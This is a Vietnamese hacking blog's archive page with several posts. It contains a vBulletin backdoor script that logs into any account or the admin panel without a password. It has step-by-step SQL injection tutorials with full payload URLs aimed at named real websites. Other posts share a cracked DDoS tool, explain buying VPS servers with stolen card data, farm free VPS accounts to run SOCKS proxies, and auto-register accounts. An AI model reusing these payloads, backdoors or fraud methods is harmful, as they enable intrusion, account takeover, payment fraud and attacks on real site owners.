Chia sẻ thông tin

KenjiVN - Quốc Trưởng

Search This Blog

Trưởng Nguyễn 's Blog

Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.

Trưởng Nguyễn 's Blog

Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.

Trưởng Nguyễn 's Blog

Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.

Trưởng Nguyễn 's Blog

Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.

Trưởng Nguyễn 's Blog

Chia sẻ kinh nghiệm, cung cấp những thông tin mới nhất về làng công nghệ. Chia sẻ những thủ thuật, những kiến thức hữu ích về công nghệ thông tin và truyền thông.

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Tuesday, June 3, 2014

Web Admin Finder - Tìm kiếm link admin với hơn 5000 patch

[​IMG]

Được thêm data hơn 5000 path giúp tìm link admin login tốt hơn

https://www.mediafire.com/?ff8ub971641vb25

Thursday, January 23, 2014

[DigitalOcean] Miễn phí 2 tháng VPS - FREE $10 Credit!

Start your project today
on DigitalOcean.
Last week, 3,865 developers signed up for DigitalOcean to host their projects, ranging from SaaS products to client projects and personal websites.
Today, we're giving away $10 in promo credit, which is enough for 2 free months on a 512 MB Droplet.
Enter promo code: SPINMEUP10
Happy coding!
DigitalOcean
Redeem FREE $10 Credit Now
Promo credit expires on 1/28/2014

Tuesday, September 3, 2013

Share Ebooks Hacking Chọn Lọc

Trong quá trình tìm hiểu Hacking, sau đây là những ebook hay, được soleil đánh giá cao và muốn chia sẻ. 
1 – Tài liệu hướng dẫn sử dụng BackTrack 5 – Version tiếng viêt

http://www.mediafire.com/view/?2kd8k4ri9jlfh68 
Tài liệu này được viết bởi cutynhangheo - Admin HCE theo kiểu biên dịch lại từ Ebook tiếng anh. Tuy chỉ nói lên 1 phần nhỏ của công cụ hack kinh điển backtrack nhưng khá bổ ích đối với các bạn đang bắt đầu tìm hiểu về Backtrack.
2 – Tấn công và bảo vệ hệ thống

http://www.mediafire.com/view/?oe6vgwigw3h7sc2 
Ebook này được viết bởi giảng viên TT Itrain – Chuyên gia bảo mật hàng đầu tại VN - tocbatdat. Với tư duy loric, kiến thức thâm hậu, cách viết rõ ràng, chi tiết. Độc giả có thể dễ dàng hiểu và nắm bắt bản chất các vấn đề xoay quanh: Nguyên tắc scan port, nguyên lý truyền tin, DDos-Botnet – Trojan-Backdoor, Gmail Hacking, Website Hacking ...
3 – Elite Collection HVA

http://www.mediafire.com/?1a46wavdgj121rb 
Ebook này được tổng hợp lại bằng phần mền – bao gồm tất các các tài liệu của nhóm Hacker hàng đầu Việt Nam – HVA với tất cả các vấn đề cơ bản xoay quanh, liên quan đến bản chất Hacking như: Unix, Lunix, Windown, Registry, How to be a Hacker...
4 – Ghi Nhớ Ubuntu

http://www.mediafire.com/view/?p6s1pv966a44rcl 
Ebook ghi nhớ các lênh trong hệ điều hành linux – Ubuntu – Cái không thể không biết khi nghiên cứu, tìm hiểu về hacking. Ebook tổng hợp khá chi tiêt và đầy đủ các câu lệnh.
5 - The Hacker's Underground Handbook 
Cuốn Ebook về hacking nước ngoài, viết về các vấn đề xoay quanh hacking như : programming, linux, password, Network Hacking, Wireless Hacking, Windown Hacking, Malware, WebsiteHacking. Cuốn ebook khá hay và chi tiết – Có cách nhìn tổng thể về hacking. Giá bán trên thị trướng khoảng vài trăm dolla.


1 số Ebook khác:
- Ebook Group HCE - Hacking + Crack = Enjoin
http://www.mediafire.com/?t9z633ovjnfa7rj 
- Ebook Group BYG – BeYeuGroup
http://www.mediafire.com/?6cqwgstt5zz2u2u 
- CEH version tiêng việt
http://www.mediafire.com/?1j8ulawa7jbya33 
- The Web Application Hacker’s Handbook
http://www.mediafire.com/view/?q2lnrgb70jtj169 
- Hacker Web Exploitation 
http://www.mediafire.com/?hzlacnv5sxddpje 
- CEH V.7 - Certified Ethical Hacker
http://www.mediafire.com/?n24cd59flriik35 
-CHFI - Computer Hacking Forensic Investigator 
http://www.mediafire.com/?4kwnoo0jji5p95v 

- Ebook SQLI- Editor by Headshot
Tất cả các password download là: soleil_vhb 

Không chia sẽ thì thôi còn nếu share thì phải tới chân long luôn.
Đây là hình cover của 30 cuốn sách:
[​IMG]
Link download:Tong-hop-cac-ebook-hack.rar

Tuesday, May 28, 2013

Hướng dẫn đưa iDevice trở về trạng thái sạch như lúc vừa jailbreak.


Trên kho Cydia vừa phát hành 1 công cụ mới mang tên ILEX RAT công cụ này cho phép chúng ta KHÔNG cần restore máy,nhưng sẽ thanh lý sạch sẽ những ứng dụng đã cài,tweak,source,thiết lập.v.v.....,đưa hệ thống trở về trạng thái ban đầu,sau đợt test của mình thì rút ra được hướng dẫn sau :
Thiết bị test : iPod touch gen 4thIOS : 5.1.1
1/. Cài đặt ILEX RAT :Trước tiên mình sẽ add thêm Source vào cydia, source : cydia.xsellize.com --- search : ILEX RAT --- tiến hành cài đặt , Respring máy.
2/. Cách sử dụng ILEX RAT :Ứng dụngILEX RAT luôn phải chạy cùng trình MobileTerminal (có thể search và cài đặt trên cydia) hoặc mình có thể sử dụng chức năng SSH trên iFunbox (phiên bản windows) hay SSH trên iTools (trên idevice phải cài thêm tweak OpenSSH) , sau đây sử dụngMobileTerminal để hướng dẫn.


Sau khi cài đặt ILEX RAT và MobileTerminal , mình chạy MobileTerminal

mình nhập : rat và nhấn return bên dưới bàn phím.

Sau đó nó sẽ cho ta 1 list với 10 lựa chọn như sau :
1. Remove All Cydia App Tweaks At Once.2. Remove All Tweaks Settings.3. Clear Cydia cache.4. Cydia troubleshooting.5. Cydia repair.6. Install or update - iLEX CYDIA TWEAKS PACK.7. Apply iLEX PACK settings.8. Restore icons arrangement state before update.9. Restore Notification Center state before update.10. Install DEB packages.Chúng ta chọn lựa chọn số 1 , ta nhập 1 và nhấn return .

Sẽ xuất hiện câu xác nhận,ta nhập y (chọn yes) rồi nhần return.

Xuất hiện cảnh báo là sẽ xoá sạch mọi ứng dụng tweak,source từ cydia. ta tiếp tục nhập y và nhấn return.

quá trình remove diễn ra,ta có thể thấy những dòng dữ liệu chạy như 1 thác nước.

Sau khi chạy xong lại có xuất hiện thông báo có remove mọi dữ liệu hay không,tiếp tục nhập y và nhấn return.

Sau khi xoá sạch mọi dữ liệu,sẽ có chỉ dẫn respring máy, log sẽ được lưu tại /tmp/rat.log
Sau khi respring thì đây là kết quả,ta sẽ thấy chỉ còn lại ứng dụng Cydia và những ứng dụng đi kèm theo máy,như 1 máy mới mà sau khi ta restore sạch và vừa jailbreak.
Kết luận : tất cả mọi tweak và thiết lập trong cydia đều được xoá sạch sẽ,những ứng dụng cài từ appstore vẫn được bảo lưu lại,và những thủ thuật can thiệp vào file hệ thống để làm đẹp máy của mình đã làm cũng không hề bị ảnh hưởng, và vấn đề chính là sau khi remove mọi thứ thì cả trình ILEX RAT cũng tự huỷ 1 thể sau khi hoàn thành nhiệm vụ .
Chú ý : Sau khi remove mọi thứ thì trong mục package sẽ xuất hiện nhiều tweak "lạ",và mục source lại trống rỗng,không sao ta chỉ cần vào change bấm refresh là xong.
Nhìn qua đối với 1 số bạn tuy có 1 độ khó nhất định nhưng mình nghỉ các bạn vẫn có thể làm được.
Các bạn có thể thảo luận trao đổi thêm tại đây,chúc các bạn thành công.

Friday, April 19, 2013

Share Razer DDos V3 crack by Hisoka

Nhận xét:
Đây là tool khá cùi đc thổi phồng khá nhiều, cơ chế check quá đơn giản.
Các tấn công nó sẽ gửi request GET như hình dưới tới các file php để attack.Có thể xếp vào dạng hostboot.


Tool share trong NBT 100% clean anh em nhé !

B1/ check lic

Highslide JS

Giao diện tool
Highslide JS

Request tới file php để attack
Highslide JS

Nội dung request
Highslide JS


hướng dẫn sử dụng : Bản này để anh em nghịch xem nó cùi tn thôi. có thể con gà code ra cái cùi bắp này sẽ del hết shell attack 
Dùng tool crack trc khi dùng.dùng xong kiểm tra lại file host nhé.Tool crack chỉ sửa file host thôi.

Anh em leck giữ bq cho mình nhé lần sau còn share tiếp.

Download
Tải về
Địa chỉ: Nhấn vào đây để tải về
Mật khẩu: Không có
_________________________________________

Tuesday, October 16, 2012

Auto reg acc LR 2s/acc




Điền email -> bấm start



Điền capcha -> bấm submit 

Chỉnh sửa các biến trong file Liberty.ini


Trích:
[Info]
First_Name=KenjiVN
Last_Name=KenjiVN
Account_Name=KenjiVN
Hello_Msg=Hello
Secret_Question=5
; Secret question codes:
;1 = Mother's Maiden Name
;2 = City of Birth
;3 = Highschool Name
;4 = Name of first love
;5 = Favorite Pet
;6 = Favorite Book
;7 = Favorite TV Show
;8 = Favorite Movies
;9 = Favorite Flower
;10 = Favorite Color
Secret_Answer=other
Yên tâm là chả có log liếc gì ở đây cả 

Acc LR sẽ auto send về mail, pass có trong file LibertyAcc.txt

Download

Wednesday, October 10, 2012

Virtual mobile phone number to receive phone and SMS



lượn vòng vòng 4rum nước ngoài thấy có giới thiệu site này !
nó bán số điện thoại và cho Redirect -> Skype , SMS thì forward về mail

http://telnum.net/buy-virtual-number-and-virtual-office-solutions

AE reg acc rùi vào buy number

gate có đủ loại. có cả CC: Visa Master
CCV
pay qua paygate của thèng Dengi Online https://www.onlinedengi.ru
/

Tuesday, August 28, 2012

Cách tạo socks private đơn giản cho bạn



Anh em đừng lạm dụng làm nó ban VN nhé

reg acc https://www.digitalocean.com
create droplets: centos 5 hoặc 6 đều ok nhé.
mỗi email 1 acc nhé.
dùng 1 gmail thêm các dấu . thành nhiều email hiện giờ vẫn dc, có thể nó sẽ kiểm tra sau.
Chờ 1-2 ph check mail nhận ip, password.
Connect vào bằng ssh client (sercure crt hoặc tunnelier hoặc putty hoặc...)
Run command:

Code:
echo y|ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa;cat ~/.ssh/id_rsa.pub > ~/.ssh/authorized_keys;ssh -fND 0.0.0.0:8888 -o StrictHostKeyChecking=no localhost
OK
Close kết nối.
Bạn đã có sock : ip:8888.
sock này vừa là socks4, socks4a,socks5 nhé
dùng 4 hay 5 đều được.
Nếu add vào Firefox bạn nên chọn socks v4 (vì socks v5 cần nhiều hơn 2 gói tin cho mỗi connection, chậm hơn socks4)

Sunday, August 19, 2012

[TUT] VPS JP Linux CCV thực vật dâm là qua

VPS CLOUD JP
Nguyên liệu:CCV Thực vật ,có bl càng tốt
K socks,VN cứ thế táng
Mail:Tùy
Đâm phát là qua luôn
Đăng kí xong có mail verify acc
Xong vào creat vps mới cần nhập CC
Hàng nhật nên dùng Google Chrome dịch cho tiện
Xong thì connect thông qua SSH Client(đoạn này chưa biết làm)
Victim
[HIDE=4"http://z-cloud.jp"][/HIDE]
Demo:
IP:210.152.137.65



chạy ubuntu
Thanks cái lấy hên
TUT của anh Localhost

Wednesday, August 8, 2012

Local attack căn bản

Local  Attack là một trong nhưng phương thức hack không được khuyên dùng vì lý do đạo đức. Tuy nhiên tìm hiểu và đề phòng local attack lại là một chuyện thú vị rất được quan tâm.
Define:
Đối với một web server thông thường.
Khi các bạn host site của mình trên server, thông thường bạn được cấp 1 account trên server đó và một thư mục để quản lý sai của mình. Ví dụ là /user/username1. Tương tự như vậy cũng có 1 thư mục là /user/username2. Giả sử /user/username2 bị hacker chiếm giữ, bằng các script thông thường, hacker có thể truy cập đến các file của bạn ở /user/username1. Các tấn công dựa trên những script ở user này tấn công vào host của user khác trên cùng server gọi là Local Attack.
More:
Thông thường nhất, Local Attack được sử dụng để đọc lấy thông tin config từ victim, sau đó dựa vào thông tin config này để phá hoại website.
Từ phương thức của Local Attack, cách phòng chống Local Attack chủ yếu dựa trên 3 mục:
Config của server: cấu hình server của super admin, tùy vào cách cấu hình mà khả năng tránh local attack sẽ tăng or giảm.
Source code của website: thường các website khi chạy trên mạng không dc zend ( encode php ) hoặc mã hóa. Khi đó local attack sẽ dễ  dàng hơn. Ngoài ra tùy vào source của từng website và tùy chỉnh của developer mà có thể hoặc không thể tránh local attack.
Chương trình bảo vệ trên server: những chương trình như NAV hoặc KPS có thể chặn được những script độc hại -> disable local attack .
Nói sơ qua về cách tấn công: như đã nói trong phương thức, chủ yếu là hacker phải đọc được config của website để tiến hành cách bước tiếp theo ( :”> ). Việc xác định file config nằm ở đâu và làm thế nào để đọc được nó đòi hỏi cả trình độ lẫn kinh nghiệm. Sau khi xác định được file config, hacker sẽ sử dụng các lệnh khác nhau để cố gắng lấy nội dung của file nay. Ở đây đưa một số ví dụ về vài vị trí file config
VBB: <root>/includes/config.php
Joomla <root>/configuration.php
………….
Nói về vài cách mà tôi biết:
Về server: Jail Apache : từ host của user này không thể truy cập tới file ở host của user khác
Về web source code: Zend -> encode source để hacker ko thể đọc được nội dung dù đã tìm ra file, chmod file để ko thể đọc từ bên ngoài …
Về security app: NAV -> tắt dc nhưng script như Shell r57 r59 …
Nhìn chung, đối với tất cả các website thì local attack là ác mộng vì gần như nếu bị local attack thì sẽ die trong nháy mắt. Tuy nhiên những hacker thực sự sẽ không sử dụng cách này trừ khi bị khiêu khích. Cho nên nếu bạn là web master, hãy ngoan ngoãn và đề phòng. Nếu bạn là server admin, phải bảo vệ cho người dùng. Nếu bạn là hacker, làm ơn đừng sử dụng cách này. Còn nếu bạn như tui nghĩ, không cần lo nhiều về nó.
Như đã nói, local attack là tấn công từ user cùng server với nhau. Vậy làm sao có thể sử dụng một user này để tấn công một user khác? Thông thường có 2 cách:
1. Cách này tốn khá nhiều thứ quý giá : tiền. Lấy  tiền mua một cái host trên server đó rồi local -> chắc 100% thành công.
2. Tấn công vào website cùng server có độ bảo mật thấp hơn. Sau đó local.
Thông thường hacker sử dụng cách thứ 2, chắc ai cũng hiểu lý do. Vậy làm sao để tấn công vào những mục tiêu bên cạnh? Có mấy bước sau:
1. Tìm xem trên server có những website nào? Cách hiện tại được dùng nhiều nhất là Reverse IP domain đó. Hiện tại có khá nhiều website cung cấp dịch vụ này.
2. Sau khi tìm được danh sách website, lần lượt check xem website nào có khả năng tấn công thành công và có thể sử dụng local.
3. TIếp theo đó tấn công website đã chọn.
4. Sau khi attack thành công, bắt đầu local attack.
5. Local attack thành công hay thất bại còn là chuyện sau này.
Quan trọng nhất ở 5 bước này là tìm xem website nào có độ bảo mật kém hơn và có thể bị hack. Thường nhưng website như thế là:
1. Những website tự làm, khả năng mắc lỗi thường cao.
2. Những source code phổ thông nhưng version đã lỗi thời.
Nếu tìm thấy trường hợp số 1, từ từ check lỗi và hack.
Nếu tìm thấy trường hợp số 2, có thể check xem version hiện tại có lõi gì không tại trang web milw0rm.com
Từ đó, các bạn có thể thấy ra được khi nào mình xài local. Đó là những website có độ bảo mật cao, không thể tấn công qua lỗi lập trình, đồng thời server config khá an toàn không thể tấn công chiếm root, bắt buộc phải local.. Những website như thế thường là những website được update thường xuyên nếu như là cái source thông dụng hoặc những website với coder pro :D.
Nói từ đầu tới h, chắc các bạn cũng nhận ra dù muốn hay không, nếu không thể chiếm server bằng cách này hay cách khác, hacker vẫn bị bắt buộc phải tấn công trực tiếp thành công một website khác. Nói như vậy, nghĩa là muốn local, hacker phải luyện mấy cái khác trước đã. Vì quan điểm này cho nên trong một số trường hợp, có thể sử dụng local :D.
Nghĩ đến chuyện tấn công trực tiếp một website nào đó với mục đích up shell / local, hacker phải lợi dụng những lỗi/lỗ hổng để can thiệp vào cấu trúc của website. Nếu các bạn đã biết, có những lỗi cực ký cơ bản mà ai tham gia security zone đều biết như:
1.Lỗi Sql Injection
2.Lỗi XSS
3.Lỗi zero-length string (có cả chuyên gia chuyên khai thác lỗi này luôn nè). -> bữa trc Joomla bị lỗi này nè.
4. và còn nhiều nhiều nữa… mà tui hok biết.
Mỗi lỗi có mức độ nguy hiểm , cách kiểm tra, và cả cách phòng chống khác nhau. Còn hacker làm sao biết nên khai thác lỗi nào, câu trả lời chỉ có thể là từ kinh nghiệm -> test các lỗi xem dính cái nào thì làm việc với cái ấy thôi…..
Nhìn chung, muốn tấn công những website dạng như vbb thuần hoặc joomla thuần hay đại loại giống vậy, cách duy nhất là local :D. Có vài hacker tự nhận mình là Hacker Mũ Bạc (đẹp), để thoát ra cái vòng trắng đen nhưng thực chất đó chỉnh là hacker mũ xám  hay thậm chí có khi tệ hơn là script kiddies giả danh, sử dụng những chiêu local thế này để nổi danh. Thực chất không đáng nói lắm.
Bài viết này chỉ nhằm dẫn người đọc đến con đường chính đạo mà thôi.

Sunday, July 29, 2012

oclHashcat-plus v0.08 Released - fastest password Cracker

Highslide JS

oclHashcat-plus is Worlds first and only GPGPU based rule engine and Worlds fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker.

Features

    Free
    Multi-GPU (up to 16 gpus)
    Multi-Hash (up to 24 million hashes)
    Multi-OS (Linux & Windows native binaries)
    Multi-Platform (OpenCL & CUDA support)
    Multi-Algo (see below)
    Low resource utilization, you can still watch movies or play games while cracking
    Focuses highly iterated, modern hashes
    Focuses single dictionary based attacks
    Supports pause / resume while cracking
    Supports reading words from file
    Supports reading words from stdin
    Integrated thermal watchdog
    20+ Algorithms implemented with performance in mind
    ... and much more


Algorithms

    MD5
    Joomla
    osCommerce, xt:Commerce
    SHA1
    SHA-1(Base64), nsldap, Netscape LDAP SHA
    SSHA-1(Base64), nsldaps, Netscape LDAP SSHA
    Oracle 11g
    SMF > v1.1
    OSX v10.4, v10.5, v10.6
    MSSQL(2000)
    MSSQL(2005)
    MySQL
    phpass, MD5(Wordpress), MD5(phpBB3)
    md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
    MD4
    NTLM
    DCC, mscash
    SHA256
    descrypt, DES(Unix), Traditional DES
    md5apr1, MD5(APR), Apache MD5
    SHA512
    OSX v10.7
    DCC2, mscash2
    Cisco-PIX MD5
    WPA/WPA2
    Double MD5
    vBulletin < v3.8.5 vBulletin > v3.8.5
    IPB2+, MyBB1.2+
    LM
    Oracle 7-10g

Download
Tải về
Địa chỉ: Nhấn vào đây để tải về
Mật khẩu: Không có

Thursday, June 14, 2012

Hướng dẫn tấn công website P2

Hướng dẫn tấn công website P2

Chào các bạn.Hôm trước đã hướng dẫn các bạn tấn công qua lỗi Inband Sql injection(http://www.blog.kenjivn.net/2012/06/huong-dan-tan-cong-website-p1.html). Hôm nay mình sẽ hướng dẫn các bạn tấn công thông qua lỗi Blind Sql injection.

Điểu kiện đọc bài viết này
+ Đã đọc kỹ bài viết tấn công website P1 của mình và hiểu vì sao mình lại thực hiện những câu truy vấn như thế.
+ Đã thank vào bài viết tấn công website P1 của mình
Cách khai thác này khá là lâu,vì thế đòi hỏi bạn phải kiên trì đọc và hiểu từ đầu đến cuối
Phần 1:Lý thuyết
SQL Injection là phương thức khai thác dựa vào quá trình trao đổi dữ liệu giữa người dùng và Web Application. Việc ứng dụng không kiểm tra các giá trị đầu vào đẫn đến attacker có thể cho thực thi các SQL query không mong muốn can thiệp vào database làm thay đổi, thêm, xem hay xóa các dữ liệu.

Hacker thường khai thác bằng các gửi các giá trị đầu vào để server sinh các thông tin lỗi để từ đó tùy biến theo câu truy vấn gốc của người thiết kế.

Nếu Web Application được customize các trang lỗi hay các trang lỗi không trả về, phải làm thế nào? Hãy thử khai thác với phương thức: blind sql injection.

Sự khác nhau giữa cơ bản giữa Inband và Blind
InBand:Hiện số column lỗi ra,ta có thể khai thác dễ dàng.
Blind :Không hiện số column lỗi.
Lấy ví dụ câu truy vấn dạng Blind thế này
Câu truy vấn 1.
Trích:
Mã:
Select content
From news 
Where new_id=$_get[‘id’] and 1=1
Câu truy vấn 2.
Trích:
Mã:
Select content ,comment
From news
Where news_id=$_get[‘id’]
Dữ liệu ta gửi cho biến id,sẽ được chèn vào cả 2 câu truy vấn,ta không thể xác định được số lượng column phù hợp khi dùng union
Đầu tiền mình giới thiệu các hàm hữu ích khi khai thác thông qua lỗi Blind sql injection.
Trích:
[CODE]convert(int,(function/query)):Convert giá trị của câu query phía sau ra kiểu int
substring(string,vị trí,số lương):Hàm cắt chuỗi
Ví dụ substring('mình',1,2) :Nghĩa là từ vị trí số 1 lấy 2 giá trị.Kết quả là kt
ascii():Kết quả trả về là giá trị mã ascii
Mã:
Ví dụ:ascii(A) kết quả là 65
limit(query,x,y) :Tương tự substring()
Phần 2.Thực hành (Chắc ai cũng khoái phần này)
Victim:http://www.julianfantino.ca (Cái này có đứa trong xgroup hỏi mà mấy đứa reply thì cứ xài tool)có đứa đưa query thì dấu cha cái link.Thôi thì mình hướng dẫn vậy.( http://www.xgroup.vn/XgR/showthread.php?t=9765 )
Bước 1 Kiểm tra lỗi
Mã:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920'
Kết quả




Thử xem nó thực hiện câu truy vấn không.
Mã:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and 1=0
=>Kết quả trả về rỗng
Mã:
[HTML]
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and 1=1
=>Kết quả trả về khác rỗng
Vậy là nó thực hiện câu truy vấn đăng sau rồi nhé
Bước 2: Kiểm tra version của nó
Mã:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and substring(version(),1,1)=5
=>Kết quả trả về bình thường.
Mã:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and substring(version(),1,1)>5
=>Kết quả trả về rỗng
Vậy kết luận version của nó là 5. mấy đó.Nói chung là lớn hơn 4 là ok rồi.vì có thể lấy được thông tin table từ database hệ thông information_schema.
Đên đây mình dừng việc kiểm tra lại.Bạn nào muốn biết 5.0 mấy thi dùng tiếp câu truy vấn
Mã:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and substring(version(),2,1)=0 --
Tương tự cho ký tự tiếp theo
Bước 3. Lấy table_name từ table tables trong data hệ thống information_schema
Đầu tiên ta lấy ký tự đầu tiên của table đầu tiên.Câu truy vấn khá dễ hiểu vì mình đã giải thích các hàm ở trên hết rồi.
Trích:

Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ASCII(SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>64 --
=>Kết quả trả về bình thường

Trích:

Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ASCII(SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>65 --
=>Kết quả trả về rỗng.Vậy ký tự đầu tiên là trong bảng mã Ascii có giá trị bằng 65=>Chữ A.
Lấy ký tự thứ 2 của table đầu tiên
Trích:

Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ASCII(SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))>99 --

=>Kết quả trả về bình thường
Trích:
Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ASCII(SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))>100 --
=>Kết quả trả về khác thường.Vậy ký tự thứ 2 của table đầu tiền có giá trị trong bảng mã ascii là =100 ->chữ d thường.table đầu tiên có 2 chữ Ad......(rồi nhé)
Làm tương tự các bạn sẽ được các ký tự khác của table đầu tiên.và ra table đầu tiên có giá trị là AddressTypes

Tương tự để tìm table thứ 2,các bạn chỉ việc thay limit 1,1 thành limit 2,1
Giá trị các table sau khi lấy là LanguageCategoryRe ,JSLibrary,JSConfigDomains ,JSConfig ,INTERFACE_ELEMENTS ,GroupOwnershipPermissions ,GeoSearchRegions ,GeoSearchPostalCodes ,GeoSearchDistrictsToPostalCodes,GeoSearchDistrict s,GeoSearchContacts,GeoSearchContactTypes,FILE_CAT EGORIES,FILES,DomainLibraryIncludes,DomainLanguage s,DefaultSequence_seq,Countries,ContentArticleLink s,ContentArticleGroups,Component,CompMailouts,Cate goryType,Category,CategoriesToArticles,CanadaPostA ddresses,AuxillaryGroupLookup,ArticleSequence_seq ,Addresses,AddressTypes,ARTICLE_MODULES

Bước 4.Lấy column từ những table đã khai thác được
Lấy ký tự đầu tiên của column đầu tiên trong table AddressTypes
Trích:

Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ascii(substring((select column_name from information_schema.columns where table_name='AddressTypes' limit 1,1),1,1))>77 --
=>Kết quả trả về bình thường
Trích:

Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920
Trích:
Mã:
and ascii(substring((select column_name from information_schema.columns where table_name='AddressTypes' limit 1,1),1,1))>78 --

=>Khác thường(rỗng)
Vậy ký tự đầu tiền có giá trị trong ascii là 78 là N
.....
Làm tương tự ta được column đầu tiên là Name
Tiếp tục thay limit 2,1 để lấy column thứ 2,ta được column thứ 2 có tên là Id


Sau đó tiếp tục khai thác column của những table khác nhé.Cố gắng lên


Bước 5.Lấy giá trị từ những column khai thác.(Đến đây tớ đuối quá rồi,table mình khác ko có mới đau chứ )
Cách lấy:

Trích:

Mã:
http://www.julianfantino.ca/EN/6221/114162?tpid=3920 and ascii(substring((select gia tri colum from gia tri table limit 1,1),1,1))=0 --
Sau khi có user và password tìm link admin đăng nhập thôi.Các bạn thấy khổ không?Hack là khổ mà.

Cách khai thác này đòi hỏi các bạn phải kiên trì,mà thường gặp loại này thì xài tools,khi nào xài tools không được thì mới query bằng tay Những tool thì các bạn không hiểu bản chất

Chú ý:Trên đây là cách khai thác thông thường từ thời xa xưa,hiện nay có 1 cách mới nhanh hơn,show ra table luôn đó cách này thấy havij chưa hỗ trợ,havij xài cách get từng ký tự)=>Cách này mình sẽ hướng dẫn cho các bạn ở P3.

Monday, June 11, 2012

Fakelogin - Đăng nhập vào forum VBB không cần pass

Code này có tác dụng là khi upload vào thư mục root của forum VBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass


Quote:
<?php
if (isset($_GET['bd']))
{
define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'");
if (!$vbulletin->userinfo['userid']) die("Invalid username!");
else
{
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET['bd']);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}

?>

Copy đoạn code trên vào notepad save đuôi *.php

Upload vào thư mục chứa forum ngang hàng với file index.php

Sau đó chạy link sau

http://domain.com/forum/*.php?bd=username

Hướng dẫn tấn công website P1

Tham gia đã lâu,hôm nay rảnh rỗi viết bài hacking cho mọi người tham khảo.Vì thấy có nhiều bạn hỏi hỏi Sql là gì?lfi,rfi là gì?Làm thế nào hack 1 website ,hack 1 forum?Làm sao get root,.....?Một phần vì ở nbt hacking không phát triển mấy .Vì thế bài viết này hi vọng giúp các bạn hiểu rõ vấn đề cũng như đam mê về hack hơn.
Định nghĩa Sql injection là gì?
Đơn giản injection tiếng việt là tiêm.Sql injection là tiêm các câu truy vấn vào.
Bài viết này mình hướng dẫn các bạn về web php,cơ sở dữ liệu phpmysql.
Sql injection chia làm 4 loại cơ bản:
• +Inband
• +Blind
• +Timebase
• +Out of band
Hôm nay ktc2608 sẽ hướng dẫn các bạn khai thác website thông qua lỗi Inband.
Lý thuyết Inband -SQLi:
-Inband là phương pháp dùng hàm union để khai thác.
-Union là hàm lien kết 2 truy vấn (query)”Select….” Với nhau.
Từ version 5.0 trở đi ,mysql có thềm :
• 1 database hệ thống là information_schema
• Các tabkle hệ thống của nó là tables,columns,table chi,….
• 2 table chúng ta cần quan tâm trong information_schema là tables và columns vì 2 table này chứ tên các table và column của website trên hệ thông
Cách khai thác gồm 4 bước
Bước 1:
Kiểm tran website có bị lỗi sql không
Bước 2:
Đếm số cột dùng order by đế xác định cột
Bước 3:
Sử dụng Union liên kết 2 câu truy vấn,tìm table cần khác thác thong qua information_schema.Tables
Bước 4:

Dựa trên information_chema.Columns để tìm các COLUMN thuộc table tương ứng bên trên.
Bước 5:

Có talbe và column cần thiết rôi ta chỉ việc khai thác thong tin cần biết
Thực hành
Victim:

Mã:
http://www.kemlam.com
Lang thang tìm được cái link này
Mã:
http://www.kemlam.com/?content=detail&proID=10
Bước 1:
Đầu tiên kiểm tra xem nó có bị lỗi sql injection không đã
Mã:
Mã:
http://www.kemlam.com/?content=detail&proID=10'
Mình thêm dấu nháy thử,vì giả sử câu truy vấn nó thế này
Mã:
$query = 'select * from sanpham where id=1';
Khi thêm dấu ' thì câu truy vấn sẽ là $query = 'select * from sanpham where id=1'';
=>Có tới 3 dấu nháy=> PHP sẽ báo syntax error hoặc hiện trang khác so với bình thường
Bước 2:Đếm số cột dùng order by đế xác định cột.Mình thử đoán số column là 13.Nên order 13 thử.
Mã:
Mã:
http://www.kemlam.com/?content=detail&proID=10 order by 13 --
==>Kết quả trả về bình thường.
Thử order by 14 xem sao
Mã:
Mã:
http://www.kemlam.com/?content=detail&proID=10 order by 14 --
Mã:
==>Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/kemlam/domains/kemlam.com/public_html/details.phpon line 8
Vậy chỉ có 13 Column
Ở đây mình sử dụng dấu -- là đến loại bỏ những phần sau câu truy vấn,trong phpmysql nó dùng để ghi những comment
